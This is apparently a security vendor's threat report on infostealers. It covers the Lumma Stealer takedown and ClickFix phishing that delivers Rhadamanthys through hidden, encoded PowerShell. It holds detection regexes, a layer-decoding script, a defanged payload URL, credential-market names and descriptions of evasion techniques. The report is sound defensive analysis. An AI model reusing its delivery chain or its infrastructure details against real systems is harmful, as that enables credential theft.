Key Findings

  • Infostealers are a cornerstone of cybercrime and were the most popular malware type of 2024.
  • ClickFix campaigns are their most recent delivery advancement.
  • Lumma Stealer was the most popular infostealer but was taken down in a large law enforcement operation yesterday.
  • We detail recent campaigns in which threat actors use ClickFix attacks to deliver the Rhadamanthys infostealer, which could become Lumma’s ‘successor.’

Mitigation Recommendations

  • Implement Multi-Factor Authentication (MFA) in every system that supports it.
  • Enable endpoint logging beyond alerts to include process, file, user, network, registry, driver and PowerShell activities.
  • Deploy continuous monitoring for suspicious authentication attempts and frequently review logs for potential unauthorized access.
  • Block suspicious TLDs associated with infostealer infrastructure.
  • Implement browser security controls to protect against credential theft.
  • Conduct targeted training on social engineering techniques.

Information stealer or ‘infostealer’ malware is used by threat actors to harvest login items, such as cookies, credentials, and session tokens, as well as cryptocurrency wallets and credit card information from victims. The stolen data is then typically packaged as ‘logs’ and sold in dark web marketplaces.

Ransomware, financial fraud, and corporate espionage are common follow-on activities leveraging this stolen data — which fuels an underground economy and poses substantial risks to organizations.

Lumma stealer was the undisputed leader in the infostealer category until yesterday when Microsoft identified almost 400,000 computers infected with the malware. A large law enforcement operation shut down more than 1,300 domains used as its command and control (C2).

This opens up two possibilities:

  • The operators of Lumma stealer may rebuild their infrastructure and return. After a takedown, operators often want to avoid the spotlight, but it’s not uncommon for criminal infrastructure disrupted by law enforcement to return after some time. Emotet is one of the best examples.
  • Other infostealers may take Lumma’s place, since there are several alternatives in underground markets. A big player, such as Formbook, could rise to the top or several smaller ones may share parts of this market.

Here, we give an overview of the history of infostealers, underscore the increasing risks posed by a ‘rising star,’ the Rhadamanthys infostealer, and discuss how threat actors distribute logs collected by several infostealers in the same forums. The actual infostealer malware is just a means to an end.

A Brief History of Infostealer Malware

Infostealer technology is not new. This type of malware is usually distributed as a service, sold via a monthly subscription that provides access to C2 servers.

Formbook, for instance, has been sold in various malware-as-a-service packages on hacking forums since 2016. By 2023, infostealers were already very common with established names, such as Raccoon, RedLine, and Vidar. But that year, we observed a rise in the popularity of more recent infostealers, such as Mystic, Aurora, Misha, and Titan.

Today, infostealers are a cornerstone of cybercrime — alongside RATs, botnets, ransomware, and C2 frameworks. In our 2024 Threat Roundup, we showed how infostealers became the most common malware type last year. We also reported on Lumma stealer becoming the most active infostealer.

ClickFix campaigns are now the most recent advancement in infostealer delivery. ClickFix attacks (also called ClearFix) involve socially engineering end users into copying and executing malicious commands (usually PowerShell) supplied by the attacker. These campaigns have been observed since the second half of 2024 and have gained popularity in 2025.

Once delivered, infostealer malware often operates in stealth, running in the background and sending the stolen data to a remote server controlled by the attacker.

Lumma Stealer has been delivered via ClickFix attacks since at least September 2024, but we recently observed campaigns delivering another stealer via similar methods: Rhadamanthys.

ClickFix Delivery: Rhadamanthys Stealer

We have observed threat actors using ClickFix attacks to deliver the Rhadamanthys infostealer.

The attacks leveraged a combination of mshta.exe – a native executable that runs Microsoft HTML Application (HTA) script code – along with a malicious URL and an authentication code. This combination, shown below, ultimately leads to the delivery of the stealer.

[Figure: Infostealer command line]

To lure victims into executing this command, the attackers crafted targeted spearphishing emails with instructions for the user to follow under the guise of verification. Here is an example spearphishing e-mail and its verification steps:

[Figure: Infostealer Windows command]

[Figure: Infostealer Cloudflare]

Behind the scenes, an obfuscated malicious PowerShell script is executed for further delivery of the payload. The script has three stages.

First Stage

The observed command, shown in the figure below, begins by invoking the PowerShell executable with the -w 1 argument, which sets the window style so that the PowerShell window is hidden. The script therefore runs in the background without a user interface, making it invisible to the user.

[Figure: Infostealer encoding]

Next, $adz is a variable assignment where the obfuscated data is processed:

  • [text.encoding]::ascii.getbytes(...) converts a string of characters into ASCII bytes.
  • sort-object { get-random -setseed 1966181726 }: The byte array is then randomly sorted using a fixed seed value. This makes the data appear scrambled, serving as a basic obfuscation technique to hide its true meaning.
  • [text.encoding]::ascii.getstring(...): After sorting, the byte array is converted back into a string, which is now obfuscated and harder to interpret at first glance.

The final goal is to get to the next stage payload, which is also a PowerShell command.
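As an added example (not code from the original post or from the campaign), the following Python triage logic flags the delivery pattern described above in process-creation telemetry: mshta.exe launched with a URL argument, and a PowerShell child started with a hidden window (-w 1) and an encoded-command argument. The sample events, their field names and the example.invalid URL are constructed for the demonstration.

```python
import re

# Constructed sample process-creation events (not taken from the page). The first two
# mirror the ClickFix chain described above; the last two are benign noise.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/verify.hta"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w 1 -e ZgB1AG4AYwB0AGkAbwBuACAA"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Unrestricted -File C:\\ops\\backup.ps1"},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},
]

# mshta.exe handed a URL instead of a local .hta file
MSHTA_REMOTE = re.compile(r"(?i)\bmshta(?:\.exe)?\b.*\bhttps?://")
# -w / -windowstyle set to 1 or hidden (PowerShell accepts any unambiguous abbreviation)
PS_HIDDEN = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+(?:1|h[a-z]*)\b")
# -e / -ec / -enc / -encodedcommand followed by a Base64 blob; "-ExecutionPolicy" does not match
PS_ENCODED = re.compile(r"(?i)(?:^|\s)-e(?:[cn][a-z]*)?\s+[A-Za-z0-9+/=]{8,}")


def classify(event: dict) -> list[str]:
    """Return the indicators one event triggers (an empty list means nothing suspicious)."""
    image, parent, cmd = (event[k].lower() for k in ("image", "parent", "cmdline"))
    hits = []
    if image == "mshta.exe" and MSHTA_REMOTE.search(cmd):
        hits.append("mshta_remote_url")
    if image == "powershell.exe":
        if PS_HIDDEN.search(cmd) and PS_ENCODED.search(cmd):
            hits.append("hidden_encoded_powershell")
        if parent == "mshta.exe":
            hits.append("powershell_spawned_by_mshta")
    return hits


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and indicators of every event that triggers at least one rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]


if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["cmdline"], "->", ", ".join(hits))
```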

Second Stage

The command is a Base64-encoded PowerShell script. The -e flag tells PowerShell to decode the encoded string and execute it as a script. The string (zgb1ag4aywb0agkabwbuacaacq…) is an obfuscated payload.

[Figure: Infostealer command line]

This PowerShell command uses two layers of obfuscation. First, it contains a Base64-encoded string; it then decodes the result as UTF-32 text to reveal the actual command, as shown below:

[Figure: Infostealer command line]
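As an added example (not the campaign’s script or the post’s own code), this Python helper peels the two stage-2 layers described above offline, so an analyst can recover the next command without executing anything: the -e argument is Base64 over UTF-16LE text, and the literal embedded in the decoded script is Base64 over UTF-32 text. The sample payload is constructed here from a harmless Write-Output command wrapped the same way.

```python
from __future__ import annotations

import base64
import binascii
import re

# A quoted Base64 literal inside a script, e.g. FromBase64String('...')
_B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decode_encoded_command(arg: str) -> str:
    """Decode the argument of `powershell -e`: Base64 over UTF-16LE text."""
    return base64.b64decode(arg).decode("utf-16-le")


def decode_utf32_literal(script: str) -> str | None:
    """Decode the first Base64 literal in the script as UTF-32 text (little-endian,
    which is what .NET's [Text.Encoding]::UTF32 produces). None if there is no such literal."""
    match = _B64_LITERAL.search(script)
    if match is None:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        if len(raw) % 4:
            return None  # not a whole number of UTF-32 code units
        return raw.decode("utf-32-le").lstrip("\ufeff")
    except (binascii.Error, UnicodeDecodeError):
        return None


def peel_layers(encoded_arg: str) -> list[str]:
    """Every layer recovered, outermost first: the -e script, then each UTF-32 layer beneath it."""
    layers = [decode_encoded_command(encoded_arg)]
    while len(layers) < 8 and (inner := decode_utf32_literal(layers[-1])) is not None:
        layers.append(inner)
    return layers


# Constructed sample (not the campaign's payload): a harmless command wrapped the same way.
INNER_COMMAND = "Write-Output 'stage-3 placeholder'"
STAGE2_SCRIPT = ("iex([Text.Encoding]::UTF32.GetString([Convert]::FromBase64String('"
                 + base64.b64encode(INNER_COMMAND.encode("utf-32-le")).decode() + "')))")
SAMPLE_ENCODED_ARG = base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for depth, layer in enumerate(peel_layers(SAMPLE_ENCODED_ARG)):
        print(f"layer {depth}: {layer}")
```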

The next file downloaded in Stage 2 is approximately 10 MB in size and protected using the commercial obfuscator Agile.NET, which applies techniques such as entity renaming and control flow obfuscation.

[Figure: Infostealer command line]

After execution, it connects to the C2 server to download the final payload from https://bird[.]stone-apple-vine[.]pro/ukk6dd9hy825.bin

Final Payload

The downloaded payload is the Rhadamanthys stealer v0.7.0. The stealer harvests a wide range of sensitive data, including system information, credentials, browser passwords, cookies, and cryptocurrency wallet contents. Its data collection capabilities are extensive. They target both mainstream applications—such as Google Chrome—and niche software, such as the Pale Moon browser and Auvitas Wallet.

Upon infection, Rhadamanthys automatically exfiltrates harvested data to its C2 infrastructure while also enabling threat actors to deploy additional extensions or execute custom commands on compromised systems. What sets Rhadamanthys apart is its modular architecture, which allows continuous feature expansion and rapid adaptation. Its extensibility and frequent updates make it a highly effective tool in the cybercriminal arsenal.

Rhadamanthys has a stage-based execution architecture:

  • Stage 1 – Loader Initialization
    Rhadamanthys begins its execution by embedding and executing Stage 2 shellcode within the .textbss section of the host Portable Executable (PE) file. This stage is responsible for initializing the unpacking process and transitioning execution to the next phase.
  • Stage 2 – System Preparation and C2 Communication
    In this stage, the malware prepares the infected environment by:
    • Getting machine and process information.
    • Performing process injection.
    • Unhooking security-related APIs.
    • Running evasion checks.
  • Stage 3 – Data Theft and Exfiltration
    In the last stage, the stealer:
    • Collects browser credentials, system information, crypto wallet data.
    • Activates image/OCR-based modules for advanced data targeting.
    • Loads additional plug-ins (extensions).
    • Exfiltrates all gathered data to the C2 server.

Other notable features of the malware include:

  • MSI-Based Payload Execution
    An upgrade in v0.7.0 is the ability to disguise and execute payloads as MSI (Microsoft Installer) files. This is done by:
    • Writing a malicious .msi to %LOCALAPPDATA%\Microsoft\.
    • Executing it using the ShellExecuteExW API.
  • Mutex-Based Kill Switch
    To ensure only one active instance, Rhadamanthys creates uniquely formatted mutexes based on a SHA-1 hash of a hardcoded byte sequence.
  • Re-Execution Delay Mechanism
    Rhadamanthys uses an encrypted timestamp stored in the Windows Registry to avoid re-executing within a set timeframe.

Lessons from Lumma Stealer: Log Distribution and TTPs

The figure below summarizes the evolution of Lumma Stealer from its inception until the takedown yesterday. This infostealer appeared at the end of 2022 but rapidly became the dominant player in this category. The malware now includes capabilities such as AMSI bypass, process hollowing, code flow obfuscation, encrypted C2 communications, and persistence via registry modifications, as well as DLL sideloading.

[Figure: Lumma Stealer evolution]

Threat actors using the malware also evolved their distribution tactics from traditional cracked software to ClickFix campaigns employing various initial access techniques and multi-stage delivery chains, such as the one we presented above for Rhadamanthys.

These actors were leveraging multiple legitimate platforms for malware distribution including Google Drive, GitHub, X, YouTube and Telegram.

Stolen credentials were then distributed in markets such as BreachForums, cracking[.]org, hard-tm[.]su, nohide[.]space, darknetarmy[.]com, niflheim[.]world, nulledbb[.]com and Telegram channels such as https://t[.]me/+seHLUhOHbVhMDM0.

One actor we followed selling stolen credentials was DaisyCloud (and variations such as up-daisycloud, daisycloud, new-daisycloud). They have been selling Lumma logs since its inception two years ago, but were also observed selling Redline stealer logs. This sheds light on how distribution points are independent of the specific stealer.

We provided a deep technical analysis of Lumma on a dedicated Medium blog, including infrastructure and targeted applications. Below is a summary of infrastructure components and observed TTPs used by threat actors distributing Lumma Stealer until the takedown. These capabilities will likely be adapted to distribute other growing infostealers, such as Rhadamanthys, in the near future.

| Infrastructure Component | Details | Purpose |
|---|---|---|
| Command and control domains | Domains with suspicious TLDs such as .shop, .top, .club, .run | Command and control |
| GitHub repositories | Used for distribution and updates | Initial payload delivery |
| Telegram channels | Multiple distribution points, including t[.]me/hitbase and t[.]me/sharmamod | Distribution, command and control, and exfiltration |
| SEO | Distribution of ClickFix campaign links | Initial infection vector |
| Bulletproof hosting | Hosting malicious payloads | Payload storage |
| Cracked software sites | Distribution of Trojanized applications | Initial infection vector |


Conclusion and Mitigation Recommendations

Lumma Stealer and Rhadamanthys exemplify new advances in credential theft techniques from traditional delivery methods to multi-stage chains with social engineering tactics. Even after Lumma’s takedown, we don’t expect infostealers to become less popular with cybercriminals. Quite the contrary, we believe that future infostealer malware will continue to blend technical sophistication with social engineering components.

The sensitive data obtained by infostealers can lead to operational disruptions, data theft, and regulatory penalties for organizations in Financial Services, Healthcare and other critical sectors, as we discussed in a recent blog.

The evolving credential theft techniques discussed in this blog have far-reaching implications that must be addressed by organizations. Therefore, we recommend the following:

| Mitigation | Priority |
|---|---|
| Implement Multi-Factor Authentication (MFA) in every system that supports it. | CRITICAL |
| Enable endpoint logging beyond alerts to include process, file, user, network, registry, driver and PowerShell activities. | CRITICAL |
| Gather logs from systems handling user authentication, especially SSO and cloud service access. | CRITICAL |
| Deploy continuous monitoring for suspicious authentication attempts and frequently review logs for potential unauthorized access. | CRITICAL |
| Rotate credentials and cryptographic keys suspected of being compromised. | CRITICAL |
| Block suspicious TLDs associated with infostealer infrastructure. | HIGH |
| Implement browser security controls to protect against credential theft. | HIGH |
| Conduct targeted training on social engineering techniques. | MEDIUM |
| Segment critical systems in the network to prevent lateral movement with compromised credentials. | MEDIUM |

Beyond these recommendations, organizations should consider dedicated threat hunting for authentication threats. These hunts should focus on:

  • Authentication attempts from anomalous geographic locations
  • Bulk data transfers from authentication infrastructure
  • Anomalous query patterns against LDAP directories
  • Anomalous certificate validation requests
  • Manipulation of certificate trust chains
  • Access to certificate private keys
  • Anomalous password reset activities
  • Failed MFA attempts on privileged accounts
  • Unauthorized token generation
  • Access from unexpected client applications
  • Anomalous permissions to service accounts
  • Creation of unauthorized administrative users
  • Modification of cloud tenant configurations
  • Abnormal access to sensitive cloud resources

To defend against infostealers, the Forescout 4D Platform™ includes advanced capabilities designed to detect and block such malware through detection rules, threat intel and behavioral analysis:

  • CY-IR-0028 EDR Telemetry: MSHTA Execution Anomaly Detection (UEBA)
  • CY-IR-0497 EDR Telemetry: Suspicious Invoke-WebRequest Execution Detected
  • CY-IR-0102 Endpoint Security: Anti-Malware Detection

Indicators of Compromise (IoCs)
